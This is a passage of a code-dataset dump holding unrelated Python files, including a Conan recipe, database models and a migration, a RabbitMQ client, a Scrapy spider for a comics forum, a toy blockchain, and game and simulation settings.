{accuracy_soft.item()}')\n","sub_path":"src/scripts/test/digits_cnn.py","file_name":"digits_cnn.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590114551","text":"from conans import ConanFile, CMake, tools\nimport os\n\n\nclass RestinioConan(ConanFile):\n name = \"restinio\"\n version = \"0.6.4\"\n\n license = \"BSD-3-Clause\"\n url = \"https://github.com/Stiffstream/restinio-conan\"\n\n description = (\n \"RESTinio is a header-only C++14 library that gives you \"\n \"an embedded HTTP/Websocket server.\"\n )\n\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {'boost_libs': ['none', 'static', 'shared'], 'use_openssl': ['false', 'true']}\n default_options = {'boost_libs': 'none', 'use_openssl': 'false'}\n generators = \"cmake\"\n source_subfolder = \"restinio\"\n build_policy = \"missing\"\n\n def requirements(self):\n self.requires.add(\"http-parser/2.8.1@bincrafters/stable\")\n self.requires.add(\"fmt/6.1.2\")\n\n if self.options.boost_libs == \"none\":\n self.requires.add(\"asio/1.12.2@bincrafters/stable\")\n else:\n self.requires.add(\"boost/1.69.0@conan/stable\")\n if self.options.boost_libs == \"shared\":\n self.options[\"boost\"].shared = True\n else:\n self.options[\"boost\"].shared = False\n \n if self.options.use_openssl == \"true\":\n self.requires.add(\"openssl/1.1.1d\")\n\n def source(self):\n source_url = \"https://github.com/Stiffstream/restinio/releases/download/\"\n tools.get(\"{0}v.{1}/restinio-{1}.zip\".format(source_url, self.version))\n extracted_dir = \"restinio-\" + self.version\n os.rename(extracted_dir, self.source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions['RESTINIO_INSTALL'] = True\n cmake.definitions['RESTINIO_FIND_DEPS'] = False\n cmake.definitions['RESTINIO_USE_BOOST_ASIO'] = self.options.boost_libs\n cmake.configure(source_folder = self.source_subfolder + \"/dev/restinio\")\n return cmake\n\n def package(self):\n self.copy(src=self.source_subfolder, pattern=\"LICENSE*\", dst=\"licenses\")\n cmake = self._configure_cmake()\n self.output.info(cmake.definitions)\n cmake.install()\n\n def package_info(self):\n self.info.header_only()\n if self.options.boost_libs != \"none\":\n self.cpp_info.defines.append(\"RESTINIO_USE_BOOST_ASIO\")\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"234487512","text":"from sqlalchemy import Column, String, Integer, Date\nfrom sqlalchemy.orm import relationship\n\nfrom dataLayer.database_connection import Base\n\n\nclass Movement(Base):\n __tablename__ = 'Movement'\n\n id = Column('Id', Integer, primary_key=True)\n message = Column('Message', String)\n image = relationship('ImageAttachment', uselist=False)\n\n def __init__(self, message, image):\n self.message = message\n self.image = image\n","sub_path":"FaceRecognition/dataLayer/entities/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381870277","text":"import torch\nimport numpy as np\nimport math\n\nclass Criterion():\n\tdef __init__(self):\n\t\tpass\n\n\tdef forward(self, input, target):\n\t\tlenn = input.size()[0]\n\t\tindices = target.view(lenn).numpy()\n\t\thotTarget = (torch.zeros(input.size())).type(torch.DoubleTensor)\n\t\thotTarget[np.arange(lenn), indices] = 1\n\n\t\t##convert input using softmax\n\t\tprobabs = input - torch.max(input, dim=1, keepdim=True)[0]\n\t\tprobabs = probabs.exp()\n\t\tprobabs = probabs/probabs.sum(dim = 1, keepdim = True)\n\t\t\n\t\t##compute log probabs for cross entropy\n\t\t#probabs = hotTarget*probabs + (1 - hotTarget)*(1 - probabs)\n\t\tlogProbabs = ((probabs).log())*hotTarget\n\t\treturn -(logProbabs.sum())/float(lenn)\n\n\tdef backward(self, input, target):\n\t\tlenn = input.size()[0]\n\t\tb = input.size()[1]\n\t\tindices = target.view(lenn).numpy()\n\t\thotTarget = (torch.zeros(input.size())).type(torch.DoubleTensor)\n\t\thotTarget[np.arange(lenn), indices] = 1\n\n\t\t##convert input using softmax\n\t\tprobabs = input - torch.max(input, dim=1, keepdim=True)[0]\n\t\tprobabs = probabs.exp()\n\t\tprobabs = probabs/probabs.sum(dim = 1, keepdim = True)\n\t\t#probabs = hotTarget*probabs + (1 - hotTarget)*(1 - probabs)\n\t\t\n\t\t##calculate the loss\n\t\tlogProbabs = (probabs).log()*hotTarget \n\t\tloss = -(logProbabs.sum())/float(lenn)\n\n\t\t##calculate derivative\n\t\tgrad = probabs - hotTarget\n\t\tgrad = grad/float(lenn)\n\t\treturn grad","sub_path":"src/Criterion.old.py","file_name":"Criterion.old.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"122754979","text":"import logging\r\nimport ssl\r\nimport configparser\r\n\r\nclass Parser(configparser.ConfigParser):\r\n def __init__(self):\r\n super(configparser.ConfigParser, self).__init__(inline_comment_prefixes=(\"#\", \";\"))\r\n def getint(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getint(self, s, k)\r\n except: return fallback\r\n def getfloat(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getfloat(self, s, k)\r\n except: return fallback\r\n def getboolean(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getboolean(self, s, k)\r\n except: return fallback\r\n \r\ndef parse(filename, required_fields={}, optional_fields={}):\r\n cfg = Parser()\r\n cfg.read(filename)\r\n\r\n config = {}\r\n for s in required_fields.keys():\r\n if not s in cfg: raise Exception(\"Unable to find {} section. Exiting\".format(s))\r\n for k, t in required_fields[s]:\r\n if not k in cfg[s]: raise Exception(\"Unable to find {}:{}. Exiting\".format(s, k))\r\n elif t == \"int\":\r\n config[k] = cfg.getint(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. Expected {}\".format(s, k, t))\r\n elif t == \"float\":\r\n config[k] = cfg.getfloat(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. Expected {}\".format(s, k, t))\r\n elif t == \"boolean\":\r\n config[k] = cfg.getboolean(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. Expected {}\".format(s, k, t))\r\n else:\r\n config[k] = cfg.get(s, k)\r\n\r\n for s in optional_fields.keys():\r\n for k, t, f in optional_fields[s]:\r\n if t == \"int\":\r\n config[k] = cfg.getint(s, k, fallback=f)\r\n elif t == \"float\":\r\n config[k] = cfg.getfloat(s, k, fallback=f)\r\n elif t == \"boolean\":\r\n config[k] = cfg.getboolean(s, k, fallback=f)\r\n else:\r\n config[k] = cfg.get(s, k, fallback=f)\r\n\r\n\r\n return config\r\n\r\ndef getContext(**kwargs):\r\n context = ssl.SSLContext(kwargs[\"protocol\"])\r\n context.check_hostname = False\r\n context.load_verify_locations(kwargs['trustedca'])\r\n context.load_cert_chain(kwargs['certpath'], kwargs['keypath'])\r\n\r\n return context\r\n\r\n\r\ndef getLogger(**kwargs):\r\n if getLogger.invoked:\r\n return logging.getLogger(\"network-capture\")\r\n getLogger.invoked = True\r\n \r\n logger = logging.getLogger('network-capture')\r\n formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(message)s')\r\n logger.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n ch.setLevel(logging.INFO)\r\n ch.setFormatter(formatter)\r\n logger.addHandler(ch)\r\n\r\n ch.setFormatter(formatter)\r\n\r\n if kwargs['logfile'] != None:\r\n fh = logging.FileHandler(kwargs['logfile'])\r\n fh.setLevel(logging.DEBUG)\r\n fh.setFormatter(formatter)\r\n logger.addHandler(fh)\r\n\r\n return logger\r\n\r\ngetLogger.invoked = False\r\n\r\n\r\n","sub_path":"src/client/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613517869","text":"'''\r\nSmall program to help show and explain the concept of a blockchain\r\nCreated as a little side project during university revision.\r\nPlease note that this is no proper full blockchain, it is very simple, primitive\r\nand will not operate as a full block chain (there is no server backend processing\r\nand all that lovely stuff!)\r\nHowever, you are able to create a blockchain with an infinate amount of blocks\r\nand search for any one you wish.\r\nThank you for your time looking at this code.\r\nDont hestiate to E-mail me for questions and how I can improve!\r\n ( harry.ej.smith@gmail.com )\r\nThanks again,\r\n - Harry Smith\r\n (Coventry Univeristy Cyber Security student)\r\n \r\n17/04/2018\r\n'''\r\n\r\n#import the hash, sys, collections and datetime modules\r\nimport hashlib\r\nimport sys\r\nimport collections\r\nfrom datetime import datetime\r\n\r\n\r\n\r\n'''Class for creation and extention of a mini, very basic, blockchain is below.\r\n\r\n The Class method called \"returnBlockData\" (line 61) uses a data structure new to\r\n python 3.3, called a Named Tuple.. It's very similar to a simple tuple - a tuple is an immutable\r\n data structure - but instead of calling it's values using an index i.e [0]\r\n it will use a class call instead.\r\n\r\n So, see the method below, it will add the following block data to a named tuple:\r\n 1. The previous hash\r\n 2. The input data\r\n 3. Date and Time of block creation\r\n This block data can then be called using the values we assigned to it.\r\n For example, we called the previous hash to be = \"hashVal\".\r\n \r\n If you see line 105, you will see by putting blockList[y].hashVal\r\n we get the hash value!\r\n Named Tuples are a very powerful, simple and memory efficient way\r\n of handling data.\r\n'''\r\n\r\n\r\nclass BlockChain():\r\n blockId = 0 # Unique number for each block\r\n\r\n def __init__(self,prevHash,inpData): # Constructor used to generate a new block in the chain\r\n self.blockIdNum = BlockChain.blockId\r\n BlockChain.blockId = BlockChain.blockId +1\r\n self.inpData = inpData\r\n self.dateTime = datetime.utcnow()\r\n self.prevHash = prevHash\r\n\r\n # Hashes input data and datetime along with the hash of the previous block. \r\n self.currentHash = hashlib.md5((self.inpData+self.prevHash+str(self.dateTime)).encode()).hexdigest() \r\n\r\n def returnBlockData(self):\r\n BlockData = collections.namedtuple('Data', 'hashVal inpData dateTime') # Initialising the Named Tuple\r\n \r\n # Assiging Hash, Data, Date and Time to the named Tuple and returning it.\r\n currentBlockData = BlockData(hashVal = self.currentHash, inpData = self.inpData, dateTime = self.dateTime) \r\n return currentBlockData\r\n\r\n\r\n'''\r\nFunction to create the very first block of the block chain.\r\nTakes no input parameters and outputs a hash value.\r\nNOTE: This block is special from the rest in that it does not\r\n take a hash as input, instead it hashes a predetermined\r\n piece of information\r\n'''\r\ndef genesisBlock():\r\n inpData = \"Fidget the very fast Migdet\"\r\n dateTime = str(datetime.utcnow())\r\n return str(hashlib.md5((inpData+str(dateTime)).encode()).hexdigest()) \r\n\r\n\r\n\r\n'''Main Function'''\r\ndef main():\r\n blockList = {}\r\n blockList[0]=(genesisBlock()) # Appends the Genesis Block hash to blockList dictionary\r\n prevHash = blockList[0] # Sets the genesis block hash to a variable to be used in\r\n # the class\r\n # The blockList dictionary has the blockId set as the key\r\n # and the block's data as the dictionary value. \r\n\r\n try:\r\n z = int(input(\"How many blocks do you wish to create?\\n\"))\r\n if z<0:\r\n raise ValueError\r\n for i in range (0,z+1):\r\n x=BlockChain(prevHash, \"1234\") # Creates a new block. \"1234\" is the input data (This can be changed)\r\n blockList[x.blockIdNum]=(x.returnBlockData()) # Saves the new block's data to dictionary with blockID as the key\r\n prevHash = blockList[x.blockIdNum].hashVal # and named tuple as the value.\r\n # Finally, sets the previous hash variable to the hash of the new block.\r\n\r\n # This try statement is used to print a whole block of the user's choosing\r\n try: \r\n y = int(input (\"What block do you wish to view? (between 0 and \"+str(z)+\")\\n\"))\r\n print (str(blockList[y].hashVal) + \" is the hash for block number \"+ str(y))\r\n print (\"It was created on \" + str(blockList[y].dateTime)+\" UTC,\")\r\n print (\"and the block's data is: \" + str(blockList[y].inpData))\r\n except (TypeError, ValueError,KeyError): # Catches any user input errors. \r\n print (\"Invalid input, please try again!\")\r\n \r\n except(TypeError, ValueError): # Catches any user input errors.\r\n print (\"Invalid input, please restart and input a positive number.\")\r\n finally:\r\n print (\"Thanks!\")\r\n \r\n #print (blockList) # Uncomment this to print out the whole block chain.\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","sub_path":"Python3/Old/MiniBlockChain.py","file_name":"MiniBlockChain.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361692264","text":"class Solution:\n def convert(self, s, numRows):\n if numRows <= 1:\n return s\n res = [''] * numRows\n i = 0\n flag = 'pos'\n for j in s:\n res[i] += j\n\n if i >= numRows - 1:\n flag = 'neg'\n elif i <= 0:\n flag = 'pos'\n\n i = i + 1 if flag == 'pos' else i - 1\n\n return ''.join(res[:])\n\n\ns = Solution()\nprint(s.convert(s=\"ABCDEFGH\", numRows=3))\n","sub_path":"Leetcode/Zigzag Conversion.py","file_name":"Zigzag Conversion.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574551251","text":"from collections import defaultdict\nimport json\nimport logging\nfrom django.conf import settings\nfrom django.utils.timezone import now\nimport pika\nfrom pika.adapters.tornado_connection import TornadoConnection\nfrom pika.exceptions import AMQPConnectionError\nimport time\nfrom django_sockjs_server.lib.config import SockJSSereverSettings\n\n\nclass PikaClient(object):\n def __init__(self, io_loop):\n self.logger = logging.getLogger(__name__)\n self.logger.info('PikaClient: __init__')\n self.io_loop = io_loop\n\n self.connected = False\n self.connecting = False\n self.connection = None\n self.channel = None\n\n self.event_listeners_count = 0\n self.event_listeners = set()\n self.subscrib_channel = defaultdict(set)\n self.last_reconnect = now()\n self.uptime_start = now()\n\n\n\n self.config = SockJSSereverSettings()\n\n def connect(self):\n if self.connecting:\n self.logger.info('django-sockjs-server(PikaClient): Already connecting to RabbitMQ')\n return\n\n self.logger.info('django-sockjs-server(PikaClient): Connecting to RabbitMQ')\n self.connecting = True\n\n cred = pika.PlainCredentials(self.config.rabbitmq_user, self.config.rabbitmq_password)\n param = pika.ConnectionParameters(\n host=self.config.rabbitmq_host,\n port=self.config.rabbitmq_port,\n virtual_host=self.config.rabbitmq_vhost,\n credentials=cred\n )\n\n try:\n self.connection = TornadoConnection(param,\n on_open_callback=self.on_connected)\n self.connection.add_on_close_callback(self.on_closed)\n except AMQPConnectionError:\n self.logger.info('django-sockjs-server(PikaClient): error connect, wait 5 sec')\n time.sleep(5)\n self.reconnect()\n\n self.last_reconnect = now()\n\n def on_connected(self, connection):\n self.logger.info('django-sockjs-server(PikaClient): connected to RabbitMQ')\n self.connected = True\n self.connection = connection\n self.connection.channel(self.on_channel_open)\n\n def on_channel_open(self, channel):\n self.logger.info('django-sockjs-server(PikaClient): Channel open, Declaring exchange')\n self.channel = channel\n self.channel.exchange_declare(exchange=self.config.rabbitmq_exhange_name,\n exchange_type=self.config.rabbitmq_exchange_type)\n self.channel.queue_declare(exclusive=False, auto_delete=True, callback=self.on_queue_declared)\n\n def on_queue_declared(self, frame):\n self.logger.info('django-sockjs-server(PikaClient): queue bind')\n self.channel.queue_bind(callback=None, exchange=self.config.rabbitmq_exhange_name, queue=frame.method.queue)\n self.channel.basic_consume(self.handle_delivery, queue=frame.method.queue, no_ack=True)\n\n def handle_delivery(self, channel, method, header, body):\n \"\"\"Called when we receive a message from RabbitMQ\"\"\"\n self.notify_listeners(body)\n\n def on_closed(self, connection, error_code, error_message):\n self.logger.info('django-sockjs-server(PikaClient): rabbit connection closed, wait 5 seconds')\n connection.add_timeout(5, self.reconnect)\n\n def reconnect(self):\n self.connecting = False\n self.logger.info('django-sockjs-server(PikaClient): reconnect')\n self.connect()\n\n def notify_listeners(self, event_json):\n event_obj = json.loads(event_json)\n\n self.logger.debug('django-sockjs-server(PikaClient): get new data = %s ' % event_obj)\n try:\n if len(self.subscrib_channel[event_obj['channel']]) > 0:\n for client in self.subscrib_channel[event_obj['channel']]:\n self.logger.debug('django-sockjs-server(PikaClient): send message channel = %s ' % event_obj['channel'])\n client.broadcast(self.subscrib_channel[event_obj['channel']], event_json)\n break\n except KeyError:\n pass\n\n def add_event_listener(self, listener):\n self.event_listeners.add(listener)\n self.event_listeners_count += 1\n self.logger.debug('django-sockjs-server(PikaClient): listener %s added' % repr(listener))\n\n def remove_event_listener(self, listener):\n try:\n self.event_listeners.remove(listener)\n self.event_listeners_count -= 1\n self.logger.debug('django-sockjs-server(PikaClient): listener %s removed' % repr(listener))\n except KeyError:\n pass\n\n def add_subscriber_channel(self, chanel, client):\n self.subscrib_channel[chanel].add(client)\n self.logger.debug('django-sockjs-server(PikaClient): listener %s add to channel %s' % (repr(client), chanel))\n\n def remove_subscriber_channel(self, chanel, client):\n try:\n self.subscrib_channel[chanel].remove(client)\n self.logger.debug('django-sockjs-server(PikaClient): listener %s remove from channel %s' % (repr(client),\n chanel))\n except KeyError:\n pass\n\n def get_event_listeners_count(self):\n return self.event_listeners_count\n\n def get_subscribe_channel_count(self):\n return len(self.subscrib_channel.keys())\n\n def get_subscribe_channels(self):\n return self.subscrib_channel.keys()\n\n def get_last_reconnect(self):\n return self.last_reconnect\n\n def get_uptime(self):\n return (now() - self.uptime_start).seconds","sub_path":"django_sockjs_server/lib/pika_client.py","file_name":"pika_client.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"639661847","text":"from gpiozero import Motor\nimport time\n\n#핀 수정 후 다시 테스트\nmotor = Motor(forward=19,backward=13,enable=26)\n\ndef motorforward(s):\n print('모터회전방향 :Forward')\n motor.forward(speed=s)\n time.sleep(1)\n motor.stop()\n\nmotorforward(1)\n \n","sub_path":"rccar +waterpump/water_pump.py","file_name":"water_pump.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"267468927","text":"import scrapy\nimport time\nfrom comics.items import ComicsItem\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass ComicsSpider(scrapy.Spider):\n name = \"Comics\"\n custom_settings = {\n 'DOWNLOADER_MIDDLEWARES' : {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy_fake_useragent.middleware.RandomUserAgentMiddleware': 400,\n }\n }\n \n def __init__(self, pages=1, **kwargs):\n self.start_url = \"https://gall.dcinside.com/board/lists/?id=comic_new2&page={}&exception_mode=recommend\".format(pages)\n super().__init__(**kwargs)\n \n def start_requests(self):\n url = self.start_url\n yield scrapy.Request(url, callback=self.parse)\n \n def parse(self, response):\n links = response.xpath('//*[@class=\"ub-content us-post\"]/td[2]/a[1]/@href').extract()\n links = list(map(response.urljoin, links))\n for link in links:\n yield scrapy.Request(link, callback=self.page_parse)\n \n def page_parse(self, response):\n item = ComicsItem()\n #title = response.xpath('//*[@class=\"gallview_head clear ub-content\"]/h3/span[2]/text()').extract_first()\n item[\"title\"] = response.xpath('//*[@class=\"gallview_head clear ub-content\"]/h3/span[2]/text()').extract_first()\n item[\"date\"] = response.xpath('//*[@class=\"gall_date\"]/text()').extract_first()\n item[\"views\"] = response.xpath('//*[@class=\"fr\"]/span[1]/text()').extract_first()[3:]\n item[\"recommend\"] = response.xpath('//*[@class=\"gall_reply_num\"]/text()').extract_first()[3:]\n item[\"link\"] = response.url\n \n try:\n try:\n # for DB\n item[\"img_link\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()[0]\n item[\"img_count\"] = len(response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract())\n item[\"image_urls\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()\n \n #for Images\n #images = []\n #img_urls = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()\n #img_count = len(response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract())\n \n #img_names = [ title + \"_\" + str(n) for n in range(img_count)]\n #for image_url, image_name in zip(img_urls, img_names):\n # images.append({'url': image_url, 'name': image_name})\n #\n #item[\"image_urls\"] = images\n except:\n pass\n \n try:\n # for DB\n item[\"img_link\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()[0]\n item[\"img_count\"] = len(response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract())\n item[\"image_urls\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()\n \n # for Images\n #images = []\n #img_urls = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()\n #img_count = len(response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract())\n #\n #img_names = [ title + \"_\" + str(n) for n in range(img_count)]\n #for image_url, image_name in zip(img_urls, img_names):\n # images.append({'url': image_url, 'name': image_name})\n #\n #item[\"image_urls\"] = images\n except:\n pass\n except:\n item[\"img_count\"] = \"0\"\n item[\"img_link\"] = \"\"\n \n time.sleep(1) # 게시물 check 딜레이\n \n yield item\n","sub_path":"comics/comics/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"541912482","text":"import pygame as pg\nimport random\nimport os\nvec = pg.math.Vector2\n\n# set up asset folders\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder,\"img\")\nsnd_folder = os.path.join(game_folder,\"snd\")\n\nTITLE = \"PROJECT LEGION\"\n\nWIDTH = 1280 # width of game window\nHEIGHT = 960 # height of game window\nFPS = 60 # frames per second\n\n# Colors (R, G, B)\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nRED = (255,0,0)\nLIME = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nCYAN = (0,255,255)\nLIGHTBLUE = (0, 155, 155)\nGREEN = (0, 155, 0)\n\n# Player properties\nPLAYER_ACC = 1.5\nPLAYER_FRICTION = -0.12\nPLAYER_GRAVITY = 0.5\nPLAYER_JUMP = 200\nPLAYER_HEIGHT = 100\nPLAYER_WIDTH = 75\nPLAYER_HEALTH = 100\nPLAYER_IMAGE = 'MitheralKnight.png'\nIFRAMES = 100\n\n#MOB PROPERTIES\nMOB_DAMAGE = 25\n\n# layers properties\nPLAYER_LAYER = 2\nPLATFORM_LAYER = 1\nMOB_LAYER = 2\nEFFECTS_LAYER = 3\n\n# weapon properties\nWEAPON_EFFECT = ''\nWEAPONS = {}\nWEAPONS['sword'] = {'rate': 250,\n 'knockback': 200,\n 'damage': 15,\n 'crit_chance': 5,\n 'offset': vec(PLAYER_WIDTH - PLAYER_WIDTH * 1/4, PLAYER_HEIGHT / 2 - PLAYER_HEIGHT),\n 'reach': (PLAYER_WIDTH*2, PLAYER_HEIGHT/8)}\n\n","sub_path":"PythonPortfolio-main/Projects/PROJECT LEGION/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"342933393","text":"import time\nimport numpy as np\n\nmycountry = (\"UA\", \"PL\")\nmycity = {'UA1': \"Kyiv\", 'UA2': \"Odessa\", 'UA3': \"Kharkiv\", 'UA4': \"Lviv\", 'UA5': \"Dnipro\",\n 'PL1': \"Warszawa\", 'PL2': \"Lublin\", 'PL3': \"Szczecin\", 'PL4': \"Wroclaw\", 'PL5': \"Bydgoszcz\"}\n\nf = open(\"advertise_log.csv\", \"w\")\n\ndef benchmark(func):\n def wrapper(*args, **kwargs):\n t = time.clock()\n res = func(*args, **kwargs)\n print(\"[{0}] has been done; duration time = {1:0.4f} s\".format(func.__name__, time.clock() - t))\n return res\n return wrapper\n\n@benchmark\ndef write_f():\n for item in range(int(1E8)):\n rnd_county = np.random.randint(0, 2)\n rnd_city = np.random.randint(1, 6)\n choose_city = str(mycountry[rnd_county])+str(rnd_city)\n rnd_userid = np.random.randint(2222,3333)\n rnd_campaignid = np.random.randint(1, 10)\n rnd_creativeid = np.random.randint(9, 20)\n rnd_price = \"{0:0.2f}\".format(np.random.random()*np.random.randint(10, 25))\n myList = [rnd_userid, mycountry[rnd_county], mycity[choose_city], rnd_campaignid, rnd_creativeid, rnd_price]\n if item % 1000000 == 0:\n print(item)\n f.write( \",\".join([str(x) for x in myList])+ \"\\n\")\n f.close()\n\n\nwrite_f()\n\n","sub_path":"myGenerator.py","file_name":"myGenerator.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"169068749","text":"\"\"\"added reserved media table\n\nRevision ID: 58a149e7eb23\nRevises: 22a55062d164\nCreate Date: 2015-06-05 13:37:40.736673\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '58a149e7eb23'\ndown_revision = '22a55062d164'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\ndef upgrade():\n '''\n id = db.Column(db.String(2000), primary_key=True)\n owner_id = db.Column(db.String(2000), db.ForeignKey('users_user.id', ondelete=\"SET NULL\"), index=True)\n owner = db.relationship(\"User\", primaryjoin=\"(ReservedMedia.owner_id == User.id)\")\n type = db.Column(db.String(50))\n media_file_name = db.Column(db.String(2000), index=True)\n media_thumbnail_file_name = db.Column(db.String(2000), index=True)\n media_file_is_deleted = db.Column(db.Boolean(), default=False)\n media_thumbnail_file_is_deleted = db.Column(db.Boolean(), default=False)\n reserved_time = db.Column(db.DateTime())\n is_deleted = db.Column(db.Boolean(), default=False)\n '''\n op.create_table(\n 'media_reserved_media',\n sa.Column('id', sa.String(length=2000), primary_key=True),\n sa.Column('owner_id', sa.String(length=2000)),\n sa.Column('type', sa.String(length=50), nullable=True),\n sa.Column('media_file_name', sa.String(length=2000), nullable=True),\n sa.Column('media_thumbnail_file_name', sa.String(length=2000), nullable=True),\n sa.Column('media_file_is_deleted', sa.Boolean(), nullable=True),\n \tsa.Column('media_thumbnail_file_is_deleted', sa.Boolean(), nullable=True),\n sa.Column('reserved_time', sa.DateTime(), nullable=True),\n sa.Column('is_deleted', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], [u'users_user.id'], name=u'media_reserved_media_owner_id_fkey'),\n )\n op.create_index(op.f('ix_media_reserved_media_owner_id'), 'media_reserved_media', ['owner_id'], unique=False)\n op.create_index(op.f('ix_media_reserved_media_media_file_name'), 'media_reserved_media', ['media_file_name'], unique=False)\n op.create_index(op.f('ix_media_reserved_media_media_thumbnail_file_name'), 'media_reserved_media', ['media_thumbnail_file_name'], unique=False)\n\ndef downgrade():\n op.drop_table('media_reserved_media')","sub_path":"alembic/versions/58a149e7eb23_added_reserved_media_table.py","file_name":"58a149e7eb23_added_reserved_media_table.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238264953","text":"##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\n# $Id$\n\nfrom esys.escript import *\nfrom esys.escript import unitsSI as U\nfrom esys.escript.pdetools import MaskFromBoundaryTag\nfrom esys.finley import ReadMesh\nfrom esys.weipa import saveVTK\nfrom esys.escript.models import StokesProblemCartesian\nfrom math import ceil\n#\n# Parameter\n#\nDIM=2\nMESHFILE=\"sub.fly\"\nETA=1.e22*U.Pa*U.sec\nV_MAX=1.*U.cm/U.yr\nALPHA=30*U.DEG\nSTRIKE=10*U.DEG\nDIP=30*U.DEG\nN=1 # boudary layer control\n\n\ng=9.81*U.m/U.sec**2\n#\n# derived values\n#\ndom=ReadMesh(MESHFILE)\nDIM=dom.getDim()\nbb=boundingBox(dom)\nLX=bb[0][1]-bb[0][0]\nif DIM == 3: LY=bb[1][1]-bb[1][0]\nDEPTH=bb[DIM-1][1]-bb[DIM-1][0]\n\nsc=StokesProblemCartesian(dom)\nx = dom.getX()\n#\nv=Vector(0.,Solution(dom))\nmask=Vector(0.,Solution(dom))\n#\n# in subduction zone:\n#\n\nif DIM==2: \n S=numpy.array([0.,0.])\n X0=[bb[0][0],bb[1][1]]\n dd=[-cos(ALPHA),-sin(ALPHA)]\nelse:\n S=numpy.array([sin(STRIKE),cos(STRIKE),0.])\n X0=[bb[0][0],bb[1][0],bb[2][1]]\n dd=[-cos(ALPHA),0.,-sin(ALPHA)]\nr=sqrt(length(x-X0)**2-inner(X0-x,S)**2)\nv=V_MAX*r*dd\nmask=MaskFromBoundaryTag(dom,\"subduction\")*[ 1. for i in range(DIM) ]\n#\n# back of the domain\n#\nv=v*(1.-whereZero(x[0]-bb[0][1])*kronecker(DIM)[0])\nmask+=whereZero(x[0]-bb[0][1])*kronecker(DIM)[0]\n#\n# bottom of the domain\n#\nv=v*(1.-((bb[DIM-1][1]-x[DIM-1])/DEPTH)**N*kronecker(DIM)[DIM-1])\nmask+=whereZero(x[DIM-1]-bb[DIM-1][0])*kronecker(DIM)[DIM-1]\n#\n# faces of the domain:\n#\nif DIM==3:\n 